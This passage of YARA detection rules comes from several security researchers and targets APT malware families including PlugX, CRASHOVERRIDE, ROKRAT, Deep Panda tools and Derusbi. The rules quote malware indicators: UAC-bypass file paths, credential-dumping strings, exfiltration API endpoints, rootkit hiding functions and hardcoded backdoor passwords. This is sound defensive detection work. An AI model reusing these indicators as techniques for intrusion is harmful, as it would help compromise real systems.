    $s3 = "kavsvc.exe" ascii fullword
    $s4 = "mspaint.exe" ascii fullword
    $s5 = "kav.exe" ascii fullword
    $s6 = "avp.exe" ascii fullword
    $s7 = "NAV.exe" ascii fullword
    $c1 = "Elevation:Administrator!new:" wide
    $c2 = "Global\\RUNDLL32EXITEVENT_NAME{12845-8654-543}" ascii fullword
    $c3 = "\\sysprep\\sysprep.exe" wide fullword
    $c4 = "\\sysprep\\CRYPTBASE.dll" wide fullword
    $c5 = "Global\\TERMINATEEVENT_NAME{12845-8654-542}" ascii fullword
    $c6 = "ConsentPromptBehaviorAdmin" ascii fullword
    $c7 = "\\sysprep" wide fullword
    $c8 = "Global\\UN{5FFC0C8B-8BE5-49d5-B9F2-BCDC8976EE10}" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 1024000 and (4 of ($s*) or 4 of ($c*)) or 1 of ($x*) or 6 of ($c*)
}

rule Codoso_PGV_PVID_4 {
  meta:
    description = "Detects Codoso APT PlugX Malware"
    author = "Florian Roth"
    reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
    date = "2016-01-30"
    super_rule = 1
    hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
    hash2 = "8a56b476d792983aea0199ee3226f0d04792b70a1c1f05f399cb6e4ce8a38761"
    hash3 = "b2950f2e09f5356e985c38b284ea52175d21feee12e582d674c0da2233b1feb1"
    hash4 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
    hash5 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
  strings:
    $x1 = "dropper, Version 1.0" wide fullword
    $x2 = "dropper" wide fullword
    $x3 = "DROPPER" wide fullword
    $x4 = "About dropper" wide fullword
    $s1 = "Microsoft Windows Manager Utility" wide fullword
    $s2 = "SYSTEM\\CurrentControlSet\\Services\\" ascii fullword
    $s3 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify" ascii fullword
    $s4 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3" ascii
    $s5 = "<supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"></supportedOS>" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 921600 and 1 of ($x*) and 2 of ($s*)
}

rule Codoso_PlugX_1 {
  meta:
    description = "Detects Codoso APT PlugX Malware"
    author = "Florian Roth"
    reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
    date = "2016-01-30"
    super_rule = 1
    hash1 = "0b8cbc9b4761ab35acce2aa12ba2c0a283afd596b565705514fd802c8b1e144b"
    hash2 = "448711bd3f689ceebb736d25253233ac244d48cb766834b8f974c2e9d4b462e8"
    hash3 = "fd22547497ce52049083092429eeff0599d0b11fe61186e91c91e1f76b518fe2"
  strings:
    $s1 = "GETPASSWORD1" ascii fullword
    $s2 = "NvSmartMax.dll" ascii fullword
    $s3 = "LICENSEDLG" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 819200 and all of them
}

rule Codoso_PGV_PVID_3 {
  meta:
    description = "Detects Codoso APT PGV PVID Malware"
    author = "Florian Roth"
    reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
    date = "2016-01-30"
    super_rule = 1
    hash1 = "126fbdcfed1dfb31865d4b18db2fb963f49df838bf66922fea0c37e06666aee1"
    hash2 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
    hash3 = "8a56b476d792983aea0199ee3226f0d04792b70a1c1f05f399cb6e4ce8a38761"
    hash4 = "b2950f2e09f5356e985c38b284ea52175d21feee12e582d674c0da2233b1feb1"
    hash5 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
    hash6 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
  strings:
    $x1 = "Copyright (C) Microsoft Corporation.  All rights reserved.(C) 2012" wide fullword
  condition:
    $x1
}

rule Codoso_PGV_PVID_2 {
  meta:
    description = "Detects Codoso APT PGV PVID Malware"
    author = "Florian Roth"
    reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
    date = "2016-01-30"
    super_rule = 1
    hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
    hash2 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
    hash3 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
  strings:
    $s0 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost" ascii fullword
    $s1 = "regsvr32.exe /s \"%s\"" ascii fullword
    $s2 = "Help and Support" ascii fullword
    $s3 = "netsvcs" ascii fullword
    $s9 = "%SystemRoot%\\System32\\svchost.exe -k netsvcs" ascii fullword
    $s10 = "winlogon" ascii fullword
    $s11 = "System\\CurrentControlSet\\Services" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 928768 and all of them
}

rule Codoso_PGV_PVID_1 {
  meta:
    description = "Detects Codoso APT PGV PVID Malware"
    author = "Florian Roth"
    reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
    date = "2016-01-30"
    super_rule = 1
    hash1 = "41a936b0d1fd90dffb2f6d0bcaf4ad0536f93ca7591f7b75b0cd1af8804d0824"
    hash2 = "58334eb7fed37e3104d8235d918aa5b7856f33ea52a74cf90a5ef5542a404ac3"
    hash3 = "934b87ddceabb2063b5e5bc4f964628fe0c63b63bb2346b105ece19915384fc7"
    hash4 = "ce91ea20aa2e6af79508dd0a40ab0981f463b4d2714de55e66d228c579578266"
    hash5 = "e770a298ae819bba1c70d0c9a2e02e4680d3cdba22d558d21caaa74e3970adf1"
  strings:
    $x1 = "Cookie: pgv_pvid=" ascii
    $x2 = "DRIVERS\\ipinip.sys" wide fullword
    $s1 = "TsWorkSpaces.dll" ascii fullword
    $s2 = "%SystemRoot%\\System32\\wiaservc.dll" wide fullword
    $s3 = "/selfservice/microsites/search.php?%016I64d" ascii fullword
    $s4 = "/solutions/company-size/smb/index.htm?%016I64d" ascii fullword
    $s5 = "Microsoft Chart ActiveX Control" wide fullword
    $s6 = "MSChartCtrl.ocx" wide fullword
    $s7 = "{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}" ascii fullword
    $s8 = "WUServiceMain" ascii fullword
  condition:
    (uint16(0) == 23117 and (1 of ($x*) or 3 of them)) or 5 of them
}

rule dragos_crashoverride_exporting_dlls {
  meta:
    description = "CRASHOVERRIDE v1 Suspicious Export"
    author = "Dragos Inc"
    reference = "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf"
  condition:
    pe.exports("Crash") & pe.characteristics
}

rule dragos_crashoverride_suspcious {
  meta:
    description = "CRASHOVERRIDE v1 Wiper"
    author = "Dragos Inc"
    reference = "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf"
  strings:
    $s0 = "SYS_BASCON.COM" wide nocase fullword
    $s1 = ".pcmp" wide nocase fullword
    $s2 = ".pcmi" wide nocase fullword
    $s3 = ".pcmt" wide nocase fullword
    $s4 = ".cin" wide nocase fullword
  condition:
    pe.exports("Crash") and any of ($s*)
}

rule dragos_crashoverride_name_search {
  meta:
    description = "CRASHOVERRIDE v1 Suspicious Strings and Export"
    author = "Dragos Inc"
    reference = "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf"
  strings:
    $s0 = "101.dll" wide nocase fullword
    $s1 = "Crash101.dll" wide nocase fullword
    $s2 = "104.dll" wide nocase fullword
    $s3 = "Crash104.dll" wide nocase fullword
    $s4 = "61850.dll" wide nocase fullword
    $s5 = "Crash61850.dll" wide nocase fullword
    $s6 = "OPCClientDemo.dll" wide nocase fullword
    $s7 = "OPC" wide nocase fullword
    $s8 = "CrashOPCClientDemo.dll" wide nocase fullword
    $s9 = "D2MultiCommService.exe" wide nocase fullword
    $s10 = "CrashD2MultiCommService.exe" wide nocase fullword
    $s11 = "61850.exe" wide nocase fullword
    $s12 = "OPC.exe" wide nocase fullword
    $s13 = "haslo.exe" wide nocase fullword
    $s14 = "haslo.dat" wide nocase fullword
  condition:
    any of ($s*) and pe.exports("Crash")
}

rule dragos_crashoverride_hashes {
  meta:
    description = "CRASHOVERRIDE Malware Hashes"
    author = "Dragos Inc"
    reference = "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf"
  condition:
    filesize < 1048576 and hash.sha1(0, filesize) == "f6c21f8189ced6ae150f9ef2e82a3a57843b587d" or hash.sha1(0, filesize) == "cccce62996d578b984984426a024d9b250237533" or hash.sha1(0, filesize) == "8e39eca1e48240c01ee570631ae8f0c9a9637187" or hash.sha1(0, filesize) == "2cb8230281b86fa944d3043ae906016c8b5984d9" or hash.sha1(0, filesize) == "79ca89711cdaedb16b0ccccfdcfbd6aa7e57120a" or hash.sha1(0, filesize) == "94488f214b165512d2fc0438a581f5c9e3bd4d4c" or hash.sha1(0, filesize) == "5a5fafbc3fec8d36fd57b075ebf34119ba3bff04" or hash.sha1(0, filesize) == "b92149f046f00bb69de329b8457d32c24726ee00" or hash.sha1(0, filesize) == "b335163e6eb854df5e08e85026b2c3518891eda8"
}

rule dragos_crashoverride_moduleStrings {
  meta:
    description = "IEC-104 Interaction Module Program Strings"
    author = "Dragos Inc"
    reference = "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf"
  strings:
    $s1 = "IEC-104 client: ip=%s; port=%s; ASDU=%u" ascii wide nocase
    $s2 = " MSTR ->> SLV" ascii wide nocase
    $s3 = " MSTR <<- SLV" ascii wide nocase
    $s4 = "Unknown APDU format !!!" ascii wide nocase
    $s5 = "iec104.log" ascii wide nocase
  condition:
    any of ($s*)
}

rule dragos_crashoverride_configReader {
  meta:
    description = "CRASHOVERRIDE v1 Config File Parsing"
    author = "Dragos Inc"
    reference = "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf"
  strings:
    $s0 = { 68 E8 ?? ?? ?? 6A 00 E8 A3 ?? ?? ?? 8B F8 83 C4 ?8 }
    $s1 = { 8A 10 3A 11 75 ?? 84 D2 74 12 }
    $s2 = { 33 C0 EB ?? 1B C0 83 C8 ?? }
    $s3 = { 85 C0 75 ?? 8D 95 ?? ?? ?? ?? 8B CF ?? ?? }
  condition:
    all of them
}

rule dragos_crashoverride_weirdMutex {
  meta:
    description = "Blank mutex creation assoicated with CRASHOVERRIDE"
    author = "Dragos Inc"
    reference = "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf"
  strings:
    $s1 = { 81 EC 08 02 00 00 57 33 FF 57 57 57 FF 15 ?? ?? 40 00 A3 ?? ?? ?? 00 85 C0 }
    $s2 = { 8D 85 ?? ?? ?? FF 50 57 57 6A 2E 57 FF 15 ?? ?? ?? 00 68 ?? ?? 40 00 }
  condition:
    all of them
}

rule dragos_crashoverride_serviceStomper {
  meta:
    description = "Identify service hollowing and persistence setting"
    author = "Dragos Inc"
    reference = "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf"
  strings:
    $s0 = { 33 C9 51 51 51 51 51 51 ?? ?? ?? }
    $s1 = { 6A FF 6A FF 6A FF 50 FF 15 24 ?? 40 00 FF ?? ?? FF 15 20 ?? 40 00 }
  condition:
    all of them
}

rule dragos_crashoverride_wiperModuleRegistry {
  meta:
    description = "Registry Wiper functionality assoicated with CRASHOVERRIDE"
    author = "Dragos Inc"
    reference = "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf"
  strings:
    $s0 = { 8D 85 A0 ?? ?? ?? 46 50 8D 85 A0 ?? ?? ?? 68 68 0D ?? ?? 50 }
    $s1 = { 6A 02 68 78 0B ?? ?? 6A 02 50 68 B4 0D ?? ?? FF B5 98 ?? ?? ?? FF 15 04 ?? ?? ?? }
    $s2 = { 68 00 02 00 00 8D 85 A0 ?? ?? ?? 50 56 FF B5 9C ?? ?? ?? FF 15 00 ?? ?? ?? 85 C0 }
  condition:
    all of them
}

rule dragos_crashoverride_wiperFileManipulation {
  meta:
    description = "File manipulation actions associated with CRASHOVERRIDE wiper"
    author = "Dragos Inc"
    reference = "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf"
  strings:
    $s0 = { 6A 00 68 80 00 00 00 6A 03 6A 00 6A 02 8B F9 68 00 00 00 40 57 FF 15 1C ?? ?? ?? 8B D8 }
    $s2 = { 6A 00 50 57 56 53 FF 15 4C ?? ?? ?? 56 }
  condition:
    all of them
}

rule ROKRAT_loader : TAU DPRK APT {
  meta:
    author = "CarbonBlack Threat Research"
    date = "2018-Jan-11"
    description = "Designed to catch loader observed used with ROKRAT malware"
    reference = "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/"
    rule_version = 1
    yara_version = "3.7.0"
    TLP = "White"
    exemplar_hashes = "e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd"
  strings:
    $n1 = "wscript.exe"
    $n2 = "cmd.exe"
    $s1 = "CreateProcess"
    $s2 = "VirtualAlloc"
    $s3 = "WriteProcessMemory"
    $s4 = "CreateRemoteThread"
    $s5 = "LoadResource"
    $s6 = "FindResource"
    $b1 = { 33 C9 33 C0 E8 00 00 00 00 5E }
    $b2 = /\xB9.{3}\x00\x81\xE9?.{3}\x00/
    $b3 = { 03 F1 83 C6 02 }
    $b4 = { 3E 8A 06 34 90 46 }
    $b5 = { 3E 30 06 46 49 83 F9 00 75 F6 }
    $hpt_1 = { 68 EC 97 03 0C }
    $hpt_2 = { 68 54 CA AF 91 }
    $hpt_3 = { 68 8E 4E 0E EC }
    $hpt_4 = { 68 AA FC 0D 7C }
    $hpt_5 = { 68 1B C6 46 79 }
    $hpt_6 = { 68 F6 22 B9 7C }
    $henc_1 = { 7B FF 84 10 1F }
    $henc_2 = { 7B 47 D9 BC 82 }
    $henc_3 = { 7B 9D 5D 1D EC }
    $henc_4 = { 7B B9 EF 1E 6F }
    $henc_5 = { 7B 08 D5 55 6A }
    $henc_6 = { 7B E5 31 AA 6F }
  condition:
    (1 of ($n*) and 4 of ($s*) and 4 of ($b*)) or all of ($hpt*) or all of ($henc*)
}

rule ROKRAT_payload : TAU DPRK APT {
  meta:
    author = "CarbonBlack Threat Research"
    date = "2018-Jan-11"
    description = "Designed to catch loader observed used with ROKRAT malware"
    reference = "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/"
    rule_version = 1
    yara_version = "3.7.0"
    TLP = "White"
    exemplar_hashes = "e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573"
  strings:
    $s1 = "api.box.com/oauth2/token" wide
    $s2 = "upload.box.com/api/2.0/files/content" wide
    $s3 = "api.pcloud.com/uploadfile?path=%s&filename=%s&nopartial=1" wide
    $s4 = "cloud-api.yandex.net/v1/disk/resources/download?path=%s" wide
    $s5 = "SbieDll.dll"
    $s6 = "dbghelp.dll"
    $s7 = "api_log.dll"
    $s8 = "dir_watch.dll"
    $s9 = "def_%s.jpg" wide
    $s10 = "pho_%s_%d.jpg" wide
    $s11 = "login=%s&password=%s&login_submit=Authorizing" wide
    $s12 = "gdiplus.dll"
    $s13 = "Set-Cookie:\\b*{.+?}\\n" wide
    $s14 = "charset={[A-Za-z0-9\\-_]+}" wide
  condition:
    12 of ($s*)
}

rule Anthem_DeepPanda_sl_txt_packed {
  meta:
    description = "Anthem Hack Deep Panda - ScanLine sl-txt-packed"
    author = "Florian Roth"
    date = "2015/02/08"
    hash = "ffb1d8ea3039d3d5eb7196d27f5450cac0ea4f34"
  strings:
    $s0 = "Command line port scanner" wide fullword
    $s1 = "sl.exe" wide fullword
    $s2 = "CPports.txt" ascii fullword
    $s3 = ",GET / HTTP/.}" ascii fullword
    $s4 = "Foundstone Inc." wide fullword
    $s9 = " 2002 Foundstone Inc." wide fullword
    $s15 = ", Inc. 2002" ascii fullword
    $s20 = "ICMP Time" ascii fullword
  condition:
    all of them
}

rule Anthem_DeepPanda_lot1 {
  meta:
    description = "Anthem Hack Deep Panda - lot1.tmp-pwdump"
    author = "Florian Roth"
    date = "2015/02/08"
    hash = "5d201a0fb0f4a96cefc5f73effb61acff9c818e1"
  strings:
    $s0 = "Unable to open target process: %d, pid %d" ascii fullword
    $s1 = "Couldn't delete target executable from remote machine: %d" ascii fullword
    $s2 = "Target: Failed to load SAM functions." ascii fullword
    $s5 = "Error writing the test file %s, skipping this share" ascii fullword
    $s6 = "Failed to create service (%s/%s), error %d" ascii fullword
    $s8 = "Service start failed: %d (%s/%s)" ascii fullword
    $s12 = "PwDump.exe" ascii fullword
    $s13 = "GetAvailableWriteableShare returned an error of %ld" ascii fullword
    $s14 = ":\\\\.\\pipe\\%s" ascii fullword
    $s15 = "Couldn't copy %s to destination %s. (Error %d)" ascii fullword
    $s16 = "dump logon session" ascii fullword
    $s17 = "Timed out waiting to get our pipe back" ascii fullword
    $s19 = "SetNamedPipeHandleState failed, error %d" ascii fullword
    $s20 = "%s\\%s.exe" ascii fullword
  condition:
    10 of them
}

rule Anthem_DeepPanda_htran_exe {
  meta:
    description = "Anthem Hack Deep Panda - htran-exe"
    author = "Florian Roth"
    date = "2015/02/08"
    hash = "38e21f0b87b3052b536408fdf59185f8b3d210b9"
  strings:
    $s0 = "%s -<listen|tran|slave> <option> [-log logfile]" ascii fullword
    $s1 = "[-] Gethostbyname(%s) error:%s" ascii fullword
    $s2 = "e:\\VS 2008 Project\\htran\\Release\\htran.pdb" ascii fullword
    $s3 = "[SERVER]connection to %s:%d error" ascii fullword
    $s4 = "-tran  <ConnectPort> <TransmitHost> <TransmitPort>" ascii fullword
    $s5 = "[-] ERROR: Must supply logfile name." ascii fullword
    $s6 = "[-] There is a error...Create a new connection." ascii fullword
    $s7 = "[+] Accept a Client on port %d from %s" ascii fullword
    $s8 = "======================== htran V%s =======================" ascii fullword
    $s9 = "[-] Socket Listen error." ascii fullword
    $s10 = "[-] ERROR: open logfile" ascii fullword
    $s11 = "-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" ascii fullword
    $s12 = "[+] Make a Connection to %s:%d ......" ascii fullword
    $s14 = "Recv %5d bytes from %s:%d" ascii fullword
    $s15 = "[+] OK! I Closed The Two Socket." ascii fullword
    $s16 = "[+] Waiting another Client on port:%d...." ascii fullword
    $s17 = "[+] Accept a Client on port %d from %s ......" ascii fullword
    $s20 = "-listen <ConnectPort> <TransmitPort>" ascii fullword
  condition:
    10 of them
}

rule Anthem_DeepPanda_Trojan_Kakfum {
  meta:
    description = "Anthem Hack Deep Panda - Trojan.Kakfum sqlsrv32.dll"
    author = "Florian Roth"
    date = "2015/02/08"
    hash1 = "ab58b6aa7dcc25d8f6e4b70a24e0ccede0d5f6129df02a9e61293c1d7d7640a2"
    hash2 = "c6c3bb72896f8f0b9a5351614fd94e889864cf924b40a318c79560bbbcfa372f"
  strings:
    $s0 = "%SystemRoot%\\System32\\svchost.exe -k sqlserver" ascii fullword
    $s1 = "%s\\sqlsrv32.dll" ascii fullword
    $s2 = "%s\\sqlsrv64.dll" ascii fullword
    $s3 = "%s\\%d.tmp" ascii fullword
    $s4 = "ServiceMaix" ascii fullword
    $s15 = "sqlserver" ascii fullword
  condition:
    all of them
}

rule APT_DeputyDog_Fexel {
  meta:
    author = "ThreatConnect Intelligence Research Team"
  strings:
    $180 = "180.150.228.102" ascii wide
    $0808cmd = { 25 30 38 78 30 38 78 00 5C 00 63 00 6D 00 64 00 2E 00 65 00 78 00 65 [2-6] 43 00 61 00 6E 00 27 00 74 00 20 00 6F 00 70 00 65 00 6E 00 20 00 73 00 68 00 65 00 6C 00 6C 00 21 }
    $cUp = "Upload failed! [Remote error code:" ascii wide nocase
    $DGGYDSYRL = { 00 44 47 47 59 44 53 59 52 4C 00 }
    $GDGSYDLYR = "GDGSYDLYR_%" ascii wide
  condition:
    any of them
}

rule APT_DeputyDog {
  meta:
    Author = "FireEye Labs"
    Date = "2013/09/21"
    Description = "detects string seen in samples used in 2013-3893 0day attacks"
    Reference = "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html"
  strings:
    $mz = { 4D 5A }
    $a = "DGGYDSYRL"
  condition:
    ($mz at 0) and $a
}

rule apt_nix_elf_derusbi {
  meta:
    Author = "@seifreed"
  strings:
    $ = "LxMain"
    $ = "execve"
    $ = "kill"
    $ = "cp -a %s %s"
    $ = "%s &"
    $ = "dbus-daemon"
    $ = "--noprofile"
    $ = "--norc"
    $ = "TERM=vt100"
    $ = "/proc/%u/cmdline"
    $ = "loadso"
    $ = "/proc/self/exe"
    $ = "Proxy-Connection: Keep-Alive"
    $ = "Connection: Keep-Alive"
    $ = "CONNECT %s"
    $ = "HOST: %s:%d"
    $ = "User-Agent: Mozilla/4.0"
    $ = "Proxy-Authorization: Basic %s"
    $ = "Server: Apache"
    $ = "Proxy-Authenticate"
    $ = "gettimeofday"
    $ = "pthread_create"
    $ = "pthread_join"
    $ = "pthread_mutex_init"
    $ = "pthread_mutex_destroy"
    $ = "pthread_mutex_lock"
    $ = "getsockopt"
    $ = "socket"
    $ = "setsockopt"
    $ = "select"
    $ = "bind"
    $ = "shutdown"
    $ = "listen"
    $ = "opendir"
    $ = "readdir"
    $ = "closedir"
    $ = "rename"
  condition:
    (uint32(0) == 18359272831) and (all of them)
}

rule apt_nix_elf_derusbi_kernelModule {
  meta:
    Author = "@seifreed"
  strings:
    $ = "__this_module"
    $ = "init_module"
    $ = "unhide_pid"
    $ = "is_hidden_pid"
    $ = "clear_hidden_pid"
    $ = "hide_pid"
    $ = "license"
    $ = "description"
    $ = "srcversion="
    $ = "depends="
    $ = "vermagic="
    $ = "current_task"
    $ = "sock_release"
    $ = "module_layout"
    $ = "init_uts_ns"
    $ = "init_net"
    $ = "init_task"
    $ = "filp_open"
    $ = "__netlink_kernel_create"
    $ = "kfree_skb"
  condition:
    (uint32(0) == 18359272831) and (all of them)
}

rule apt_nix_elf_Derusbi_Linux_SharedMemCreation {
  meta:
    Author = "@seifreed"
  strings:
    $byte1 = { B6 03 00 00 ?? 40 00 00 00 ?? 0D 5F 01 82 }
  condition:
    (uint32(0) == 1179403647) and (any of them)
}

rule apt_nix_elf_Derusbi_Linux_Strings {
  meta:
    Author = "@seifreed"
  strings:
    $a1 = "loadso" ascii wide fullword
    $a2 = "\nuname -a\n\n" ascii wide
    $a3 = "/dev/shm/.x11.id" ascii wide
    $a4 = "LxMain64" ascii wide nocase
    $a5 = "# \\u@\\h:\\w \\$ " ascii wide
    $b1 = "0123456789abcdefghijklmnopqrstuvwxyz" wide
    $b2 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" wide
    $b3 = "ret %d" wide fullword
    $b4 = "uname -a\n\n" ascii wide
    $b5 = "/proc/%u/cmdline" ascii wide
    $b6 = "/proc/self/exe" ascii wide
    $b7 = "cp -a %s %s" ascii wide
    $c1 = "/dev/pts/4" ascii wide fullword
    $c2 = "/tmp/1408.log" ascii wide fullword
  condition:
    uint32(0) == 1179403647 and ((1 of ($a*) and 4 of ($b*)) or (1 of ($a*) and 1 of ($c*)) or 2 of ($a*) or all of ($b*))
}

rule apt_win_exe_trojan_derusbi {
  meta:
    Author = "@seifreed"
  strings:
    $sa_1 = "USB" ascii wide
    $sa_2 = "RAM" ascii wide
    $sa_3 = "SHARE" ascii wide
    $sa_4 = "HOST: %s:%d"
    $sa_5 = "POST"
    $sa_6 = "User-Agent: Mozilla"
    $sa_7 = "Proxy-Connection: Keep-Alive"
    $sa_8 = "Connection: Keep-Alive"
    $sa_9 = "Server: Apache"
    $sa_10 = "HTTP/1.1"
    $sa_11 = "ImagePath"
    $sa_12 = "ZwUnloadDriver"
    $sa_13 = "ZwLoadDriver"
    $sa_14 = "ServiceMain"
    $sa_15 = "regsvr32.exe"
    $sa_16 = "/s /u" ascii wide
    $sa_17 = "rand"
    $sa_18 = "_time64"
    $sa_19 = "DllRegisterServer"
    $sa_20 = "DllUnregisterServer"
    $sa_21 = { 8B [5] 8B ?? D3 ?? 83 ?? 08 30 [5] 40 3B [5] 72 }
    $sb_1 = "PCC_CMD_PACKET"
    $sb_2 = "PCC_CMD"
    $sb_3 = "PCC_BASEMOD"
    $sb_4 = "PCC_PROXY"
    $sb_5 = "PCC_SYS"
    $sb_6 = "PCC_PROCESS"
    $sb_7 = "PCC_FILE"
    $sb_8 = "PCC_SOCK"
    $sc_1 = "bcdedit -set testsigning" ascii wide
    $sc_2 = "update.microsoft.com" ascii wide
    $sc_3 = "_crt_debugger_hook" ascii wide
    $sc_4 = "ue8G5" ascii wide
    $sd_1 = "NET" ascii wide
    $sd_2 = "\\\\.\\pipe\\%s" ascii wide
    $sd_3 = ".dat" ascii wide
    $sd_4 = "CONNECT %s:%d" ascii wide
    $sd_5 = "\\Device\\" ascii wide
    $se_1 = "-%s-%04d" ascii wide
    $se_2 = "-%04d" ascii wide
    $se_3 = "FAL" ascii wide
    $se_4 = "OK" ascii wide
    $se_5 = "2.03" ascii wide
    $se_6 = "XXXXXXXXXXXXXXX" ascii wide
  condition:
    (uint16(0) == 23117) and ((all of ($sa_*)) or ((13 of ($sa_*)) and ((5 of ($sb_*)) or (3 of ($sc_*)) or (all of ($sd_*)) or ((1 of ($sc_*)) and (all of ($se_*))))))
}

rule Trojan_Derusbi {
  meta:
    Author = "RSA_IR"
    Date = "4Sept13"
    File = "derusbi_variants v 1.3"
    MD5 = " c0d4c5b669cc5b51862db37e972d31ec "
  strings:
    $b1 = { 8B 15 ?? ?? ?? ?? 8B CE D3 EA 83 C6 ?? 30 90 ?? ?? ?? ?? 40 3B 05 ?? ?? ?? ?? 72 ?? }
    $b2 = { F3 5D 88 2E ?? ?? 00 00 BE 07 18 2E F0 5D 88 2E F7 5D 88 2E 0C A2 88 2E 4B 5D 88 2E F3 5D 88 2E }
    $b3 = { 4E E6 40 BB }
    $b4 = { B1 19 BF 44 }
    $b5 = { 6A F5 44 3D ?? ?? 00 00 27 AF D4 3D 69 F5 44 3D 6E F5 44 3D 95 0A 44 3D D2 F5 44 3D 6A F5 44 3D }
    $b6 = { F3 5D 88 2E ?? ?? 00 00 BE 07 18 2E F0 5D 88 2E }
    $b7 = { D6 D5 A4 A3 ?? ?? 00 00 9B 8F 34 A3 D5 D5 A4 A3 D2 D5 A4 A3 29 2A A4 A3 }
    $b8 = { C3 76 33 9F ?? ?? 00 00 8E 2C A3 9F C0 76 33 9F C7 76 33 9F 3C 89 33 9F }
  condition:
    2 of ($b1, $b2, $b3, $b4) and 1 of ($b5, $b6, $b7, $b8)
}

rule APT_Derusbi_DeepPanda {
  meta:
    author = "ThreatConnect Intelligence Research Team"
    reference = "http://www.crowdstrike.com/sites/default/files/AdversaryIntelligenceReport_DeepPanda_0.pdf"
  strings:
    $D = "Dom4!nUserP4ss" ascii wide
  condition:
    $D
}

rule APT_Derusbi_Gen {
  meta:
    author = "ThreatConnect Intelligence Research Team"
  strings:
    $2 = "273ce6-b29f-90d618c0" ascii wide
    $A = "Ace123dx" ascii wide fullword
    $A1 = "Ace123dxl!" ascii wide fullword
    $A2 = "Ace123dx!@#x" ascii wide fullword
    $C = "/Catelog/login1.asp" ascii wide
    $DF = "~DFTMP$$$$$.1" ascii wide
    $G = "GET /Query.asp?loginid=" ascii wide
    $L = "LoadConfigFromReg failded" ascii wide
    $L1 = "LoadConfigFromBuildin success" ascii wide
    $ph = "/photoe/photo.asp HTTP" ascii wide
    $PO = "POST /photos/photo.asp" ascii wide
    $PC = "PCC_IDENT" ascii wide
  condition:
    any of them
}

rule derusbi_kernel {
  meta:
    description = "Derusbi Driver version"
    date = "2015-12-09"
    author = "Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud"
  strings:
    $token1 = "$$$--Hello"
    $token2 = "Wrod--$$$"
    $cfg = "XXXXXXXXXXXXXXX"
    $class = ".?AVPCC_BASEMOD@@"
    $MZ = "MZ"
  condition:
    $MZ at 0 and $token1 and $token2 and $cfg and $class
}

rule derusbi_linux {
  meta:
    description = "Derusbi Server Linux version"
    date = "2015-12-09"
    author = "Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud"
  strings:
    $PS1 = "PS1=RK# \\u@\\h:\\w \\$"
    $cmd = "unset LS_OPTIONS;uname -a"
    $pname = "[diskio]"
    $rkfile = "/tmp/.secure"
    $ELF = "\x7fELF"
  condition:
    $ELF at 0 and $PS1 and $cmd and $pname and $rkfile
}

rule Derusbi_Kernel_Driver_WD_UDFS {
  meta:
    description = "Detects Derusbi Kernel Driver"
    author = "Florian Roth"
    reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
    date = "2015-12-15"
    score = 80
    hash1 = "1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016"
    hash2 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a"
    hash3 = "6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58"
    hash4 = "e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59"
  strings:
    $x1 = "\\\\.\\pipe\\usbpcex%d" wide fullword
    $x2 = "\\\\.\\pipe\\usbpcg%d" wide fullword
    $x3 = "\\??\\pipe\\usbpcex%d" wide fullword
    $x4 = "\\??\\pipe\\usbpcg%d" wide fullword
    $x5 = "$$$--Hello" ascii fullword
    $x6 = "Wrod--$$$" ascii fullword
